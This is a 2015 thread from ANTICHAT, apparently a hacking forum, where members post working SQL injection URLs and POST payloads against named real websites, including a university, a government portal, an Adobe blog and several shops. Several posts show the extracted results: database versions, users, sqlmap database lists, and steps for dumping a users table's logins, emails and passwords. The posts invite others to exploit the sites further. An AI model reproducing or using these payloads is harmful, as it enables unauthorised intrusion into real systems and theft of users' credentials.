ANTICHAT: a forum on information security, OSINT and technology

08.06.2015, 15:02 | Guest | Posts: n/a | Time spent on forum: 182660 | Reputation: 324
Squeezed the "maximum" out of error-based )) from a potential vulnerability to the start of the dump in ~5 requests))
Code:
URL: http://2c5whdbcb6m2c2xx.onion/search/1%27%29%09and%09%28%28SELECT%09%28i%09IS%09NOT%09NULL%29%09-%09-9223372036854775808%09FROM%09%28SELECT%09%28concat%28version%28%29%29%29i%29a%29%29=2--%09
version() = 5.5.43-0+deb7u1
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x3a,substr(@,1,400),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x3a,substr(@,300,700),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Result (table names in hoursppc_biznewenc):
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users' and @:=CONCAT(@,0x2C,CONCAT(column_name))),@),5)),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Result (column names in hoursppc_biznewenc.users):
Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POST DATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(select length(MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM users WHERE @:=CONCAT(@,0x2C,CONCAT(login,0x3b,email,0x3b,password))),@),5))),0x3a,(SELECT mid(@,1,400)),0x7d7d7d))i)a)&url=%2Fproducts%2F7
Result (a fragment of select concat(login,0x3b,email,0x3b,password) from hoursppc_biznewenc.users):

09.06.2015, 23:15 | Guest | Posts: n/a | Time spent on forum: 179197 | Reputation: 25
Code:
http://forums.sbo.sailboatowners.com/q_login.php?do=login
POST
redirect=http%3A%2F%2Fsbo.sailboatowners.com%2Find ex.php%3Foption%3Dcom_content%26task%3Dview%26id%3 D30%26Itemid%3D64&vb_login_username=asfasf'or(Extr actValue(1,concat(0x3a,(select+user()))))='1&vb_lo gin_password=asfasf&cookieuser=1&image.x=0&image.y =0&s=&do=login&vb_login_md5password=0a040ec34abbfb 7f3030345244a913c9&vb_login_md5password_utf=0a040e c34abbfb7f3030345244a913c9
vB integrated into Joomla; admin panels and the like are hidden all over the place, but everything can be found and dumped. Maybe someone will be interested in trying.

09.06.2015, 23:41 | Guest | Posts: n/a | Time spent on forum: 35200 | Reputation: 6
Code:
https://blogs.adobe.com/adobelife/photos/?gid=-1+/*!uNIoN*/+(/*!SelEcT*/+1,1,1,concat(0x3a3a3a3a3a,database(),0x3a3a3a3a3a)+)+--+;
WP is installed

11.06.2015, 20:33 | Guest | Posts: n/a | Time spent on forum: 8455 | Reputation: 7
KAMCHATKA SCIENTIFIC CENTER
Code:
http://www.kscnet.ru/ivs/kvert/volc.php?lang=en&name=99999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),14,15,16,17,18,19,20+--+
TIC 750, PR 5
5.5.30-log

15.06.2015, 23:45 | Guest | Posts: n/a | Time spent on forum: 15245 | Reputation: 11
SQLi:
Code:
http://boroughs.org/subpage.php?link=Borough-News-Magazine'+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,concat_ws(0x3b3c62723e,database(),user(),version(),@@version_compile_os),7,8,9,10,11+--+

17.06.2015, 15:00 | Guest | Posts: n/a | Time spent on forum: 94006 | Reputation: 24
Code:
http://sanpid.com/index.php?page=1&cid=220&pid=-371+union+Select+version%28%29+--+
Version: 5.0.96-community-log

18.06.2015, 07:09 | Guest | Posts: n/a | Time spent on forum: 15245 | Reputation: 11
SQLi:
Code:
http://www.rnd.goa.gov.in/content_news_disp.php?id=-14+union+select+1,2,3,4,CONCAT_WS%280x3b3c62723e,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,6,7,8,9,10,11+--+
rnd@localhost; 5.6.22; rnd

19.06.2015, 11:02 | Guest | Posts: n/a | Time spent on forum: 216062 | Reputation: 231
Code:
http://pr.alexa.cn/index.php?url=1' OR EXTRACTVALUE(8396,CONCAT(0x5c,0x716a787171,(SELECT (ELT(8396=8396,1))),0x7171787671)) AND 'BvUT'='BvUT
alexa.cn traffic 590k
error-based
hostname: 'AY12063001214105c7538'
'root'@'127.0.0.1'
Nginx, PHP 5.4.37, MySQL >= 5.0.0
DB list:

22.06.2015, 10:32 | Guest | Posts: n/a | Time spent on forum: 216062 | Reputation: 231
Code:
http://leton.tv/player.php?streampage=tnj1bde' AND (SELECT 4549 FROM(SELECT COUNT(*),CONCAT(0x716a717671,(SELECT (ELT(4549=4549,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Iimq'='Iimq&width=600&height=450
leton.tv traffic 1.6kk, video streaming service
error based
PHP 5.3.3, Nginx, MySQL >= 5.0.0
DBA: True
hostname: 'hostname.change.me'
''@'hostname.change.me'
''@'localhost'
'root'@'127.0.0.1'
'root'@'hostname.change.me'
'root'@'localhost'
DB list:

25.06.2015, 11:40 | Guest | Posts: n/a | Time spent on forum: 216062 | Reputation: 231
cashbackmonitor.com, traffic 430k, shop comparison
Code:
Parameter: #1* (URI)
AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND 2703=2703 AND 'nUyh'='nUyh
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND (SELECT 2579 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(2579=2579,1))),0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hlmZ'='hlmZ
Title: Generic UNION query (NULL) - 22 columns
Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' UNION ALL SELECT NULL,CONCAT(0x716a627671,0x4647646f4f536d657563,0x7178787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
available databases [3]:
[*] CashbackMonitor
[*] information_schema
[*] test
-------------------------------------------------------------
sydney.edu.au traffic 2.2kk
Code:
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://sydney.edu.au:80/medicine/public-health/research/publications.php?year=2010' AND (SELECT 5421 FROM(SELECT COUNT(*),CONCAT(0x716a6a7871,(SELECT (ELT(5421=5421,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sBCP'='sBCP
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
available databases [266]: